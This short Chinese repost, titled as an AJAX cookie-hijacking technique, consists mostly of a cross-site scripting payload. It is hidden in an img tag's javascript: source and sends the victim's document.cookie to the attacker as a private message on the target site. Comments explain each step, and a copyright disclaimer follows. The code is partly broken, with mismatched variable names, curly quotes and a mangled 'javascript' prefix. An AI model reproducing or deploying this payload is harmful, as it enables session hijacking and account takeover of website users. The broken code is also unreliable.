AJAX 劫持cookie
一个简单的httprequest声明以及提交的过程
<img src="javascript.:
//这里先要把XMLHttpRequestObject设置为false来验证声明httprequest时是否为true
var XMLHTTPRequestObject = false;
if (window.XMLHttpRequest)
{
XMLHttpRequestObject = new XMLHttpRequest();
}
else if(window.ActiveXObject)
{
XMLHttpRequestObject = new ActiveXObject("Microsoft.XMLHTTP");
}
else
{
alert("Javascript must be enabled to continue.");
}
function socket()
{
//下面这行将非常重要.注意cookies是以参数的形式进行提交的
XMLHttpRequestObject.open(‘GET‘, ‘http://www.site.com/privatemessage.php?
user=yourusername&subject=‘ + window.document.cookie, true);
XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
XMLHttpRequestObject.send(null);
//这句执行完,我们就可以放下心来了。
delete XMLHttpRequestObject;
}
//不要忘记这是一张图片,所以我们必须关闭标签
window.document.onload=‘socket();‘">
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。